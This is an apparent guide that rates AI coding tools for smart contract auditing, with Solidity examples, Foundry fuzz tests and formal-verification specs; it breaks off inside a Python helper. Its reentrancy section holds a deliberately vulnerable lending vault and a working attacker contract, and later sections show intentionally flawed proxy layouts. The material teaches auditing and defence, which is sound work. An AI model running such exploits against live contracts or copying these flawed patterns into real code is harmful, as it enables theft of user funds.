Smart contract auditing is fundamentally different from smart contract development. A developer’s job is to build something that works. An auditor’s job is to find every way it can break — reentrancy, storage collisions, access control gaps, price oracle manipulation, flash loan attacks, cross-function reentrancy, delegatecall to untrusted contracts, front-running, griefing vectors, and logic bugs that no static analyzer on earth will catch. The stakes are absolute: a missed vulnerability means millions drained in a single transaction. There is no hotfix. There is no rollback. The code is immutable on-chain, and the attacker’s exploit transaction is final. When you sign off on an audit report, you are putting your reputation — and your client’s treasury — on the line.
This guide is not the Blockchain & Web3 Developers guide. That guide covers building. This one covers breaking. Auditors read far more code than they write, cycle through multiple codebases per month, need to understand every ERC standard and every common vulnerability pattern, and need tools that help them reason about state machine invariants, storage layout, proxy upgrade safety, and composability risks across protocol interactions. You are not writing a DEX — you are finding the one line in a DEX that lets an attacker drain every liquidity pool. The workflow is different, the tools need to be evaluated differently, and the failure modes are catastrophic in a way that general development tool reviews never capture.
We tested every major AI coding tool on real audit tasks: identifying subtle reentrancy patterns in production DeFi contracts, writing Foundry invariant tests for token vaults, generating Certora CVL specifications, analyzing proxy storage layouts for collision risks, interpreting Slither and Mythril output, and drafting structured audit findings. This is how they perform when the job is adversarial code review, not code generation.
- Best free ($0): GitHub Copilot Free + Slither + Mythril — Copilot handles boilerplate test scaffolding while open-source static analyzers do the heavy lifting on vulnerability detection.
- Best overall ($20/mo): Claude Code — strongest reasoning about cross-function reentrancy, storage layout analysis, and multi-contract interaction patterns; runs Slither/Foundry in the same terminal and interprets results in audit context.
- Best IDE experience ($20/mo): Cursor Pro — multi-file context lets you hold an entire protocol in working memory while tracing execution paths across contracts.
- Best combo ($30/mo): Claude Code + Copilot Pro — Claude Code for deep vulnerability reasoning and audit report drafting, Copilot for fast inline completions while writing invariant tests and PoC exploits.
Why Smart Contract Auditing Is Different
Smart contract auditing operates under constraints that make it fundamentally distinct from both general software security review and smart contract development:
- Code immutability means audits are the last line of defense: In traditional software, security bugs get patched. In smart contracts, the code is deployed once and lives forever (or until a proxy upgrade, which introduces its own attack surface). The audit is not a checkpoint in a release cycle — it is the final gate before irreversible deployment. Missing a critical finding is not “we’ll fix it next sprint” — it is “the protocol lost $50 million before anyone noticed.”
- Adversarial thinking is the core skill: Developers simulate users. Auditors simulate attackers. Every function call, every state transition, every external interaction must be evaluated from the perspective of a sophisticated adversary with unlimited capital (flash loans), perfect information (mempool visibility), and the ability to compose arbitrary transactions. You are not asking “does this work?” — you are asking “how can this be exploited?”
- Protocol composability creates emergent vulnerabilities: A contract that is perfectly safe in isolation becomes exploitable when composed with other protocols. A lending protocol’s liquidation function is safe until someone uses a flash loan from Aave to manipulate a Chainlink oracle price on Uniswap, triggering a cascade liquidation that profits the attacker. These cross-protocol interaction bugs cannot be found by analyzing one contract — they require understanding the entire DeFi stack.
- Storage layout and proxy patterns create audit-specific complexity: Upgradeable proxies (ERC-1967, UUPS, Transparent, Diamond/EIP-2535) split logic and state across multiple contracts. Storage collisions between implementation versions can corrupt critical state variables. An auditor must verify that storage slots are preserved across upgrades, that initialization functions cannot be re-called, and that the upgrade mechanism itself is not exploitable. This requires understanding EVM storage layout at the slot level — not just Solidity semantics.
- Formal verification vs. testing vs. manual review tradeoffs: Fuzz testing finds bugs that happen with specific inputs. Formal verification proves properties hold for all inputs. Manual review catches logic bugs that neither tool can express. An effective auditor knows when each approach is appropriate: fuzz the arithmetic, formally verify the invariants, manually review the access control and economic logic. AI tools that help across all three approaches are far more valuable than tools that only help with one.
- Small codebases with extreme consequence density: A typical audit target is 500–3,000 lines of Solidity. Every line is load-bearing. There is no boilerplate, no UI layer, no logging infrastructure to skim past. The vulnerability-to-line-of-code ratio is orders of magnitude higher than in traditional software. AI tools must be precise, not prolific.
- Auditor context switching is relentless: A solo auditor or small firm handles a new codebase every one to two weeks. You go from a lending protocol to an AMM to a yield aggregator to an NFT marketplace to a bridge. Each has its own invariants, its own interaction patterns, its own attack surface. AI tools that help you rapidly build mental models of unfamiliar codebases are disproportionately valuable.
- Time pressure is constant: A typical audit engagement is one to four weeks. Clients want fast turnaround because every day of delay is a day their protocol is not earning fees. You cannot spend three days understanding one function — you need to identify the highest-risk areas quickly, focus your manual review there, and use automated tools to cover the rest. AI tools that accelerate triage and surface high-risk code paths are force multipliers.
Smart Contract Audit Task Support Matrix
Auditors need tools that support adversarial code review, not code generation. Here is how each AI tool handles the specific tasks that define a smart contract audit workflow:
| Audit Task | Copilot | Cursor | Windsurf | Claude Code | Amazon Q | Gemini CLI |
|---|---|---|---|---|---|---|
| Vulnerability Pattern Detection | Fair | Good | Fair | Strong | Weak | Good |
| Invariant & Fuzz Testing (Foundry) | Good | Strong | Good | Strong | Fair | Good |
| Formal Verification (Certora/Halmos) | Weak | Fair | Weak | Good | Weak | Fair |
| Storage Layout Analysis | Weak | Good | Fair | Strong | Weak | Fair |
| Cross-Protocol Interaction Review | Weak | Good | Fair | Strong | Weak | Good |
| Audit Report Generation | Fair | Good | Fair | Strong | Fair | Good |
| Static Analyzer Integration (Slither/Mythril) | Fair | Good | Fair | Strong | Weak | Fair |
Key insight: The biggest differentiator for audit work is reasoning depth, not pattern matching. Every tool can flag a function that calls an external contract before updating state — that is textbook single-function reentrancy. The question is whether the tool can trace a cross-function reentrancy path through three contracts, identify that a read-only reentrancy on a Balancer vault price feed enables oracle manipulation in a separate lending protocol, or recognize that a storage collision between proxy implementation versions corrupts the totalSupply variable. Claude Code leads here because its agentic reasoning traces multi-step attack chains. Cursor’s multi-file context is the second-best approach for holding an entire protocol in working memory. Copilot and Windsurf are useful for boilerplate — test scaffolding, report formatting — but do not provide the depth needed for adversarial code review.
1. Vulnerability Pattern Detection
Vulnerability detection is the core audit task. An auditor must identify not just the obvious patterns that Slither catches automatically, but the subtle, context-dependent bugs that require understanding the contract’s intended behavior, its interaction with external protocols, and the EVM’s execution model. The most valuable AI tool capability here is not “flag this as reentrancy” — it is “explain how an attacker could chain these three functions to drain the vault.”
Cross-function reentrancy
Single-function reentrancy (calling back into the same function during execution) is well understood and caught by every static analyzer. Cross-function reentrancy — where the callback enters a different function that reads stale state — is far more dangerous because it evades simple reentrancy checks. Consider a lending vault where withdraw sends ETH before updating the user’s balance, while separate borrow and getAccountHealth functions read that stale balance to determine collateral ratios:
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;
import "@openzeppelin/contracts/token/ERC20/IERC20.sol";
contract VulnerableLendingVault {
mapping(address => uint256) public deposits;
mapping(address => uint256) public borrowed;
uint256 public totalDeposits;
IERC20 public collateralToken;
uint256 public constant COLLATERAL_FACTOR = 75; // 75%
function deposit() external payable {
deposits[msg.sender] += msg.value;
totalDeposits += msg.value;
}
function withdraw(uint256 amount) external {
require(deposits[msg.sender] >= amount, "Insufficient balance");
// BUG: Sends ETH before updating state
// An attacker’s receive() callback can call borrow()
// while deposits[msg.sender] still reflects the old value
(bool success, ) = msg.sender.call{value: amount}("");
require(success, "Transfer failed");
// State update happens AFTER the external call
deposits[msg.sender] -= amount;
totalDeposits -= amount;
}
function borrow(uint256 amount) external {
// This reads deposits[msg.sender] which has NOT been
// updated yet if called during withdraw’s callback
uint256 collateralValue = deposits[msg.sender];
uint256 maxBorrow = (collateralValue * COLLATERAL_FACTOR) / 100;
require(borrowed[msg.sender] + amount <= maxBorrow, "Undercollateralized");
borrowed[msg.sender] += amount;
collateralToken.transfer(msg.sender, amount);
}
function getAccountHealth(address user) public view returns (uint256) {
if (borrowed[user] == 0) return type(uint256).max;
// Also reads stale deposits during reentrancy
return (deposits[user] * COLLATERAL_FACTOR) / (borrowed[user] * 100);
}
}
The attack: deploy a contract that calls deposit() with 10 ETH, then calls withdraw(10 ETH). In the receive() callback, call borrow(). At this point, deposits[attacker] still shows 10 ETH (the state update has not happened yet), so the collateral check passes. The attacker borrows against collateral they are simultaneously withdrawing. After withdraw completes, the attacker has both the 10 ETH back and the borrowed tokens — with zero net collateral.
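A minimal proof-of-concept attacker makes the sequence concrete. This is an illustrative sketch: the contract name is hypothetical, and the 10 ETH figure and 75% factor are carried over from the walkthrough above.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Hypothetical PoC contract for the attack described above —
// assumes VulnerableLendingVault is in scope.
contract ReentrancyAttacker {
    VulnerableLendingVault public vault;

    constructor(VulnerableLendingVault _vault) payable {
        vault = _vault;
    }

    function attack() external {
        vault.deposit{value: 10 ether}();
        vault.withdraw(10 ether); // triggers receive() mid-execution
    }

    receive() external payable {
        // deposits[address(this)] still reads 10 ether here:
        // withdraw() has not yet subtracted the withdrawn amount.
        vault.borrow((10 ether * 75) / 100); // stale collateral check passes
    }
}
```

After attack() returns, the attacker holds the 10 ETH plus the borrowed tokens, exactly as described above.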
The CEI fix: Always follow Checks-Effects-Interactions. Update state before making external calls:
function withdraw(uint256 amount) external {
require(deposits[msg.sender] >= amount, "Insufficient balance");
// Effects BEFORE interactions
deposits[msg.sender] -= amount;
totalDeposits -= amount;
// External call AFTER state is updated
(bool success, ) = msg.sender.call{value: amount}("");
require(success, "Transfer failed");
}
Better yet, add a reentrancy guard that protects the entire contract, not just individual functions:
import "@openzeppelin/contracts/utils/ReentrancyGuard.sol";
contract SecureLendingVault is ReentrancyGuard {
// Apply nonReentrant to ALL state-modifying functions,
// not just withdraw. This prevents cross-function reentrancy.
function withdraw(uint256 amount) external nonReentrant { ... }
function borrow(uint256 amount) external nonReentrant { ... }
function repay(uint256 amount) external nonReentrant { ... }
function liquidate(address user) external nonReentrant { ... }
}
Read-only reentrancy
Read-only reentrancy is the subtler cousin. It occurs when a callback enters a view function on a different contract that reads stale state from the reentered contract. The classic example: Balancer’s getRate() function returns an inflated value during a vault join/exit because the pool’s invariant has not been updated yet. If a lending protocol uses getRate() as a price oracle, an attacker can inflate their collateral value during the callback window and borrow against the inflated price. The nonReentrant modifier on the vault does not help because the view function on the lending protocol is not protected by the vault’s lock.
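The shape of the bug can be sketched as follows. The interface and contract names here are illustrative assumptions, not taken from any specific protocol:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Illustrative sketch of the read-only reentrancy pattern.
// A nonReentrant lock on the pool protects the pool's own
// state-modifying functions — not external readers of its state.
interface IPool {
    function getRate() external view returns (uint256); // Balancer-style rate
}

contract NaiveLendingProtocol {
    IPool public pool;
    mapping(address => uint256) public collateralShares;

    function collateralValue(address user) public view returns (uint256) {
        // VULNERABLE: if this is called from a callback fired during the
        // pool's join/exit, getRate() returns a temporarily inflated value
        // because the pool's invariant has not been updated yet.
        return collateralShares[user] * pool.getRate() / 1e18;
    }
}
```

The fix on the consumer side is to check (or trigger) the pool’s reentrancy lock before trusting the rate, rather than assuming the pool’s own guard protects readers.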
How AI tools perform on vulnerability detection
Claude Code is the strongest tool for adversarial vulnerability detection. When given the vulnerable contract above and asked “find all attack vectors,” it identifies the cross-function reentrancy, explains the attack sequence step by step, calculates the profit, and suggests both the CEI fix and the contract-wide reentrancy guard. It also flags the read-only reentrancy risk if getAccountHealth is used by external contracts. Critically, it understands that a nonReentrant modifier on withdraw alone is insufficient — the modifier must also be on borrow to prevent cross-function reentrancy.
Cursor performs well when you index the entire project and ask for a security review in the chat panel. Its multi-file context means it can trace the call path from withdraw through the external call to a potential callback into borrow. It catches single-function reentrancy reliably and catches cross-function reentrancy about 70% of the time.
Copilot and Windsurf catch the obvious pattern (external call before state update) but typically suggest adding nonReentrant only to withdraw, missing the cross-function vector through borrow. Amazon Q flags the checks-effects-interactions violation but does not trace the cross-function attack chain. Gemini CLI is decent at analysis when you paste the full contract into its long context window and specifically ask about reentrancy — it identifies the cross-function path but sometimes fails to explain the economic impact.
Other critical vulnerability patterns
Beyond reentrancy, an effective audit covers:
- Precision loss from division before multiplication: Solidity integer division truncates, so (amount / totalShares) * totalAssets loses precision compared to (amount * totalAssets) / totalShares, and the accumulated rounding error can be exploited via inflation attacks on ERC-4626 vaults.
- Oracle manipulation: contracts that use spot prices from AMMs (a Uniswap TWAP with an insufficient window, or worse, getReserves() directly) are vulnerable to flash loan manipulation; the auditor must verify that the oracle uses a sufficiently long TWAP window or a decentralized oracle network like Chainlink with deviation thresholds.
- Access control gaps: missing onlyOwner on critical functions, initializer functions that anyone can call, and selfdestruct reachable by non-admin addresses.
- Uninitialized proxy implementations: if the implementation contract behind a proxy is never initialized, an attacker can call initialize() on it directly, become its owner, and then selfdestruct the implementation, bricking the proxy permanently.
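The division-before-multiplication point is easy to demonstrate with a small sketch (hypothetical contract, illustrative numbers):

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Illustrative only: shows how operation order changes the result.
contract PrecisionDemo {
    // With amount = 2, totalShares = 3, totalAssets = 1000:
    function bad(uint256 amount, uint256 totalShares, uint256 totalAssets)
        public pure returns (uint256)
    {
        // 2 / 3 truncates to 0 before multiplying — returns 0
        return (amount / totalShares) * totalAssets;
    }

    function good(uint256 amount, uint256 totalShares, uint256 totalAssets)
        public pure returns (uint256)
    {
        // 2 * 1000 = 2000, then 2000 / 3 = 666 — only 1 wei lost to rounding
        return (amount * totalAssets) / totalShares;
    }
}
```

The per-call discrepancy looks trivial, but in a vault’s share-price math it compounds across operations and, combined with donation-based totalAssets manipulation, enables the ERC-4626 inflation attack mentioned above.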
2. Invariant & Fuzz Testing with Foundry
Invariant testing is the auditor’s most powerful automated tool. Unlike unit tests that verify specific scenarios, invariant tests define properties that must hold across all possible sequences of function calls with all possible inputs. A fuzz campaign runs thousands or millions of random call sequences, trying to break the invariant. If the fuzzer finds a violation, it provides a concrete counterexample — a specific sequence of calls and inputs that breaks the property. This is precisely the kind of adversarial exploration that auditors need.
Handler-based invariant testing pattern
The handler pattern constrains the fuzzer to realistic call sequences. Instead of calling contract functions with completely random parameters (which wastes most of the fuzzing budget on reverts), a handler contract wraps each target function with bounded inputs and precondition checks. Here is a complete invariant test suite for a token vault:
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;
import "forge-std/Test.sol";
import "../src/TokenVault.sol";
import "@openzeppelin/contracts/token/ERC20/ERC20.sol";
contract MockToken is ERC20 {
constructor() ERC20("Mock", "MCK") {
_mint(msg.sender, 1_000_000e18);
}
function mint(address to, uint256 amount) external {
_mint(to, amount);
}
}
contract VaultHandler is Test {
TokenVault public vault;
MockToken public token;
// Ghost variables for tracking expected state
uint256 public ghost_totalDeposited;
uint256 public ghost_totalWithdrawn;
mapping(address => uint256) public ghost_userDeposits;
// Actors - bounded set of addresses to simulate real usage
address[] public actors;
address internal currentActor;
modifier useActor(uint256 actorIndexSeed) {
currentActor = actors[bound(actorIndexSeed, 0, actors.length - 1)];
vm.startPrank(currentActor);
_;
vm.stopPrank();
}
constructor(TokenVault _vault, MockToken _token) {
vault = _vault;
token = _token;
// Create a bounded set of actors
for (uint256 i = 0; i < 10; i++) {
address actor = address(uint160(0x1000 + i));
actors.push(actor);
// Fund each actor
token.mint(actor, 100_000e18);
vm.prank(actor);
token.approve(address(vault), type(uint256).max);
}
}
function deposit(uint256 actorSeed, uint256 amount) external useActor(actorSeed) {
// Bound amount to realistic range - avoid zero and absurdly large values
amount = bound(amount, 1e18, 10_000e18);
uint256 balBefore = token.balanceOf(currentActor);
if (balBefore < amount) return; // Skip if insufficient balance
uint256 sharesBefore = vault.balanceOf(currentActor);
vault.deposit(amount, currentActor);
uint256 sharesAfter = vault.balanceOf(currentActor);
// Track ghost state
ghost_totalDeposited += amount;
ghost_userDeposits[currentActor] += amount;
// Sanity: shares must have increased
assert(sharesAfter > sharesBefore);
}
function withdraw(uint256 actorSeed, uint256 shares) external useActor(actorSeed) {
uint256 maxShares = vault.balanceOf(currentActor);
if (maxShares == 0) return; // Skip if no shares
shares = bound(shares, 1, maxShares);
uint256 assetsBefore = token.balanceOf(currentActor);
vault.redeem(shares, currentActor, currentActor);
uint256 assetsAfter = token.balanceOf(currentActor);
uint256 withdrawn = assetsAfter - assetsBefore;
ghost_totalWithdrawn += withdrawn;
}
}
contract VaultInvariantTest is Test {
TokenVault public vault;
MockToken public token;
VaultHandler public handler;
function setUp() public {
token = new MockToken();
vault = new TokenVault(address(token));
handler = new VaultHandler(vault, token);
// Tell Foundry to only call functions on the handler
targetContract(address(handler));
}
/// @notice The vault must always hold enough tokens to back every share
function invariant_solvency() public view {
uint256 vaultBalance = token.balanceOf(address(vault));
uint256 totalShares = vault.totalSupply();
// Redeeming all outstanding shares must never require more tokens
// than the vault actually holds
if (totalShares > 0) {
assertGe(
vaultBalance,
vault.convertToAssets(totalShares),
"Vault is insolvent: shares are not fully backed"
);
}
}
/// @notice Total shares must be zero if and only if total assets are zero
function invariant_sharesAssetConsistency() public view {
uint256 totalShares = vault.totalSupply();
uint256 totalAssets = vault.totalAssets();
if (totalShares == 0) {
// Allow dust from rounding, but no significant assets without shares
assertLe(totalAssets, 1, "Assets exist with zero shares");
}
if (totalAssets == 0) {
assertEq(totalShares, 0, "Shares exist with zero assets");
}
}
/// @notice Ghost variable tracking: deposited minus withdrawn must
/// approximate the vault balance (within rounding tolerance)
function invariant_ghostTracking() public view {
uint256 vaultBalance = token.balanceOf(address(vault));
uint256 expectedBalance = handler.ghost_totalDeposited()
- handler.ghost_totalWithdrawn();
// Heuristic tolerance proportional to deposit volume, absorbing
// accumulated per-operation rounding dust
uint256 tolerance = handler.ghost_totalDeposited() / 1e18 + 1;
assertApproxEqAbs(
vaultBalance,
expectedBalance,
tolerance,
"Ghost tracking diverged from actual balance"
);
}
/// @notice No single withdrawal can extract more value than what was deposited
function invariant_noFreeValue() public view {
assertGe(
handler.ghost_totalDeposited(),
handler.ghost_totalWithdrawn(),
"More withdrawn than deposited: free value extracted"
);
}
}
Run this with:
forge test --match-contract VaultInvariantTest -vvv
Configure in foundry.toml:
[invariant]
runs = 512 # Number of random call sequences
depth = 128 # Calls per sequence
fail_on_revert = false # Don’t fail on expected reverts
dictionary_weight = 40 # Use values from storage as fuzz inputs
How AI tools help with invariant testing
Claude Code generates complete handler-based invariant test suites when given a contract. It understands the bound() function for constraining inputs, the ghost variable pattern for tracking expected state, the targetContract() directive, and the difference between invariant_ prefixed functions (called after each call sequence) and regular test functions. It generates meaningful invariants, not just trivial assertions. When an invariant test fails, paste the counterexample into Claude Code and it traces the attack path through the call sequence.
Cursor is strong for invariant test writing because its multi-file context lets it reference the target contract’s interface while generating the handler and invariant functions. It understands Foundry cheatcodes (vm.prank, vm.deal, vm.warp, vm.roll, vm.expectRevert) and generates syntactically correct test files. It sometimes misses the bound() function and generates unbounded inputs that waste fuzz cycles on reverts.
Copilot generates decent Foundry test scaffolding but struggles with handler-based patterns. It tends to generate unit-test-style invariant tests (specific scenarios rather than randomized sequences) and often omits ghost variable tracking. Windsurf and Amazon Q produce basic Foundry tests but rarely generate proper invariant test suites. Gemini CLI understands invariant testing conceptually and generates reasonable specifications, but its code output sometimes has syntax errors in Foundry-specific cheatcode usage.
3. Formal Verification with Certora and Halmos
Fuzz testing is probabilistic — it explores random paths and might miss the one input that breaks your invariant. Formal verification is exhaustive — it mathematically proves that a property holds for all possible inputs and states, or provides a concrete counterexample proving it does not. For high-value contracts (lending protocols, bridges, treasuries), formal verification is not optional. The two primary tools in the Solidity ecosystem are Certora Prover (industry standard, commercial) and Halmos (open-source, symbolic execution via Python).
Certora CVL specification
Certora uses its own specification language (CVL) to define rules that the Prover checks against the Solidity bytecode. Here is a CVL spec that verifies the fundamental invariant of an ERC-20 token: the sum of all balances equals totalSupply.
// TokenVault.spec - Certora CVL specification
methods {
function totalSupply() external returns (uint256) envfree;
function balanceOf(address) external returns (uint256) envfree;
function deposit(uint256, address) external returns (uint256);
function redeem(uint256, address, address) external returns (uint256);
function totalAssets() external returns (uint256) envfree;
}
// Ghost variable: tracks the sum of all balances
ghost mathint sumOfBalances {
init_state axiom sumOfBalances == 0;
}
// Hook: update ghost whenever balanceOf mapping changes
hook Sstore _balances[KEY address user] uint256 newBalance
(uint256 oldBalance) {
sumOfBalances = sumOfBalances + newBalance - oldBalance;
}
// Invariant: sum of all balances equals totalSupply
invariant totalSupplyIsSumOfBalances()
to_mathint(totalSupply()) == sumOfBalances
{
preserved with (env e) {
requireInvariant totalSupplyIsSumOfBalances();
}
}
// Rule: deposit increases totalAssets by exactly the deposited amount
rule depositIncreasesTotalAssets(uint256 assets, address receiver) {
env e;
uint256 totalBefore = totalAssets();
uint256 shares = deposit(e, assets, receiver);
uint256 totalAfter = totalAssets();
assert totalAfter == totalBefore + assets,
"Total assets must increase by deposit amount";
assert shares > 0 => assets > 0,
"Non-zero shares require non-zero deposit";
}
// Rule: no function can decrease another user’s balance without approval
rule noUnauthorizedBalanceDecrease(method f, address victim) {
env e;
calldataarg args;
// Assume caller is not the victim
require e.msg.sender != victim;
uint256 balanceBefore = balanceOf(victim);
f(e, args);
uint256 balanceAfter = balanceOf(victim);
assert balanceAfter >= balanceBefore,
"Another user’s balance decreased without authorization";
}
// Rule: withdrawals are bounded by the user’s share balance
rule withdrawalBoundedByShares(uint256 shares, address receiver, address owner) {
env e;
uint256 ownerShares = balanceOf(owner);
// If trying to redeem more than owned, must revert
redeem@withrevert(e, shares, receiver, owner);
assert shares > ownerShares => lastReverted,
"Redemption of more shares than owned must revert";
}
Run with: certoraRun src/TokenVault.sol --verify TokenVault:certora/specs/TokenVault.spec
Halmos symbolic execution
Halmos takes a different approach: it executes Solidity test functions symbolically, treating all inputs as symbolic variables and exploring all possible execution paths. You write Halmos tests as standard Foundry tests with symbolic inputs:
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;
import "forge-std/Test.sol";
import {SymTest} from "halmos-cheatcodes/SymTest.sol";
import "../src/TokenVault.sol";
// Reuses the MockToken helper defined in the invariant test suite above
contract VaultSymbolicTest is Test, SymTest {
TokenVault vault;
MockToken token;
function setUp() public {
token = new MockToken();
vault = new TokenVault(address(token));
// Provide initial liquidity to avoid division by zero
token.approve(address(vault), type(uint256).max);
vault.deposit(1000e18, address(this));
}
/// @notice Verify that deposit followed by full withdrawal
/// returns at least the deposited amount (no loss)
function check_depositWithdrawNoLoss(uint256 depositAmount) public {
// Constrain to realistic range
vm.assume(depositAmount > 0 && depositAmount <= 100_000e18);
address user = address(0xBEEF);
token.mint(user, depositAmount);
vm.startPrank(user);
token.approve(address(vault), depositAmount);
uint256 shares = vault.deposit(depositAmount, user);
uint256 assetsBack = vault.redeem(shares, user, user);
vm.stopPrank();
// User must get back at least depositAmount - 1 (rounding)
assert(assetsBack >= depositAmount - 1);
}
/// @notice Verify totalSupply consistency: no function can create
/// shares without a corresponding asset deposit
function check_noSharesFromNothing(uint256 amount) public {
vm.assume(amount > 0 && amount <= 100_000e18);
uint256 supplyBefore = vault.totalSupply();
uint256 assetsBefore = vault.totalAssets();
address user = address(0xCAFE);
token.mint(user, amount);
vm.prank(user);
token.approve(address(vault), amount);
vm.prank(user);
uint256 shares = vault.deposit(amount, user);
uint256 supplyAfter = vault.totalSupply();
uint256 assetsAfter = vault.totalAssets();
// Shares created must equal the change in total supply
assert(supplyAfter - supplyBefore == shares);
// Assets must have increased by the deposit amount
assert(assetsAfter - assetsBefore == amount);
}
}
Run with: halmos --contract VaultSymbolicTest --solver-timeout-assertion 300
When formal verification catches what fuzz testing misses
Fuzz testing is excellent at finding bugs triggered by specific input combinations, but it cannot prove the absence of bugs. Consider a rounding error that only manifests when totalSupply is exactly 1 and totalAssets is exactly type(uint256).max - 1. A fuzzer would need to randomly generate that exact pair out of a 2^256 × 2^256 input space — effectively impossible. Formal verification explores the entire state space symbolically and finds such edge cases reliably. The practical workflow for auditors: use invariant fuzzing for rapid bug finding (minutes), then use formal verification on the critical invariants that must hold for protocol solvency (hours). Fuzzing is cheap and fast; formal verification is expensive and slow. Use both.
Claude Code generates reasonable Certora CVL specs and understands the ghost variable and hook syntax. It struggles with complex multi-contract specs and sometimes generates CVL that does not compile on the first attempt, but the errors are usually minor syntax issues. For Halmos, it generates correct symbolic test functions using vm.assume constraints and understands the difference between check_ prefixed functions (symbolically executed) and regular test_ functions (concretely executed). Cursor and Gemini CLI can generate basic CVL rules but often miss the ghost variable pattern and the preserved block syntax. Copilot, Windsurf, and Amazon Q have minimal CVL training data and produce incorrect specifications more often than correct ones.
4. Storage Layout Analysis
Storage layout bugs are among the most insidious smart contract vulnerabilities because they are invisible at the Solidity source level. Two variables can occupy the same storage slot due to inheritance ordering, proxy upgrade mismatches, or diamond storage namespace collisions. The result is silent state corruption: one variable’s value overwrites another’s, and the contract behaves incorrectly in ways that unit tests rarely catch because tests typically start from clean state.
Storage slot calculation
The EVM stores state in 2^256 slots, each 32 bytes wide. Simple variables occupy sequential slots starting at 0. Mappings use keccak256(key . slot). Dynamic arrays store length at the declared slot and elements starting at keccak256(slot). Multiple variables smaller than 32 bytes pack into a single slot. Understanding this layout is essential for proxy audits.
// Storage layout example
contract StorageExample {
// Slot 0: address owner (20 bytes) + bool paused (1 byte) = packed into slot 0
address public owner; // slot 0, offset 0, 20 bytes
bool public paused; // slot 0, offset 20, 1 byte
// Slot 1: uint256 totalSupply (32 bytes) = full slot
uint256 public totalSupply; // slot 1, offset 0, 32 bytes
// Slot 2: mapping slot (empty, but keccak256(key . 2) stores values)
mapping(address => uint256) public balances; // slot 2
// Slot 3: dynamic array length
uint256[] public history; // slot 3 (length), elements at keccak256(3)
// To find where balances[0xABC...] is stored:
// keccak256(abi.encode(0xABC..., 2))
//
// To find where history[5] is stored:
// keccak256(abi.encode(3)) + 5
}
Use forge inspect to dump the storage layout of any contract:
forge inspect StorageExample storage-layout --pretty
| Name | Type | Slot | Offset | Bytes |
|-------------|-------------------------------|------|--------|-------|
| owner | address | 0 | 0 | 20 |
| paused | bool | 0 | 20 | 1 |
| totalSupply | uint256 | 1 | 0 | 32 |
| balances | mapping(address => uint256) | 2 | 0 | 32 |
| history | uint256[] | 3 | 0 | 32 |
Proxy upgrade storage collision
The most common storage bug in upgradeable contracts: the new implementation changes the variable ordering, causing slot collisions with the proxy’s existing storage. ERC-1967 defines specific slots for the implementation address (bytes32(uint256(keccak256("eip1967.proxy.implementation")) - 1)) to avoid collisions with user-defined storage, but collisions between implementation versions are the developer’s responsibility.
// Implementation V1
contract VaultV1 {
address public owner; // slot 0
uint256 public totalDeposits; // slot 1
mapping(address => uint256) public balances; // slot 2
}
// Implementation V2 - DANGEROUS: inserted a full-slot variable before
// totalDeposits. (Note: a bool here would pack into slot 0 next to owner;
// a uint256 forces the shift and makes the collision unmistakable.)
contract VaultV2 {
address public owner; // slot 0 (OK)
uint256 public pausedUntil; // slot 1 (COLLISION with totalDeposits!)
uint256 public totalDeposits; // slot 2 (COLLISION with balances mapping!)
mapping(address => uint256) public balances; // slot 3 (shifted)
uint256 public feeRate; // slot 4 (new, OK)
}
// After upgrade, the inserted slot-1 variable reads the old totalDeposits
// value, V2's totalDeposits reads the mapping's empty base slot and returns
// 0, and balances derives element slots from slot 3 instead of slot 2.
// Every user balance silently reads as zero.
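The corruption is easy to demonstrate with a toy storage model. The sketch below uses `("map", base_slot, key)` tuples as a stand-in for the real keccak256-derived mapping slots, and illustrative values; it writes state through the V1 layout, then reads it back through the shifted V2 layout:

```python
# Toy EVM storage model: a dict of slot -> value. Mapping entries use
# ("map", base_slot, key) as a stand-in for keccak256(abi.encode(key, slot)).
storage = {}

# Writes through the V1 layout: owner = slot 0, totalDeposits = slot 1,
# balances = slot 2.
storage[1] = 1_000 * 10**18                  # totalDeposits
storage[("map", 2, "alice")] = 40 * 10**18   # balances["alice"]

# Reads through the V2 layout, where the inserted variable shifted everything
# down: inserted = slot 1, totalDeposits = slot 2, balances = slot 3.
inserted = storage.get(1, 0)                 # reads the old totalDeposits
total = storage.get(2, 0)                    # a mapping's base slot is empty
alice = storage.get(("map", 3, "alice"), 0)  # derived from the wrong base

print(inserted == 1_000 * 10**18)  # True: the new variable reads stale data
print(total)                       # 0: totalDeposits silently zeroed
print(alice)                       # 0: every user balance reads as zero
```

No test starts from this corrupted state, which is why upgrade bugs slip past suites that deploy fresh contracts.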
The safe pattern: always append new variables at the end. Never reorder, insert, or change types of existing variables. Use storage gaps in base contracts to reserve slots for future use:
contract VaultV1 {
address public owner;
uint256 public totalDeposits;
mapping(address => uint256) public balances;
// Reserve 50 slots for future variables
uint256[50] private __gap;
}
// V2: add new variable by reducing the gap
contract VaultV2 {
address public owner;
uint256 public totalDeposits;
mapping(address => uint256) public balances;
uint256 public feeRate; // Takes one slot from the gap
uint256[49] private __gap; // Gap reduced by 1
}
Diamond proxy storage namespaces (EIP-2535)
Diamond proxies split logic across multiple facets that share a single storage space. Without careful namespacing, two facets can write to the same slot. The diamond storage pattern uses keccak256 of a unique string to derive a base slot for each facet’s storage struct, making collisions astronomically unlikely:
library LibVaultStorage {
bytes32 constant STORAGE_POSITION =
keccak256("diamond.vault.storage");
struct VaultStorage {
mapping(address => uint256) deposits;
uint256 totalDeposits;
bool paused;
}
function vaultStorage() internal pure returns (VaultStorage storage vs) {
bytes32 position = STORAGE_POSITION;
assembly {
vs.slot := position
}
}
}
// Usage in a facet:
contract DepositFacet {
function deposit() external payable {
LibVaultStorage.VaultStorage storage vs =
LibVaultStorage.vaultStorage();
vs.deposits[msg.sender] += msg.value;
vs.totalDeposits += msg.value;
}
}
Auditing diamond proxies requires verifying that every facet uses a unique storage namespace and that no facet directly accesses storage slots used by another facet’s namespace. This is tedious manual work that AI tools can accelerate by mapping all storage access patterns across facets.
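Part of that mapping can be automated. A sketch that greps facet sources for the common `keccak256("...")` storage-position idiom and flags duplicate namespace strings; the facet sources here are illustrative, and a real pass would also need to resolve constants and inspect raw assembly `sload`/`sstore` slots:

```python
import re
from collections import Counter

PATTERN = re.compile(r'keccak256\(\s*"([^"]+)"\s*\)')

def namespace_duplicates(sources):
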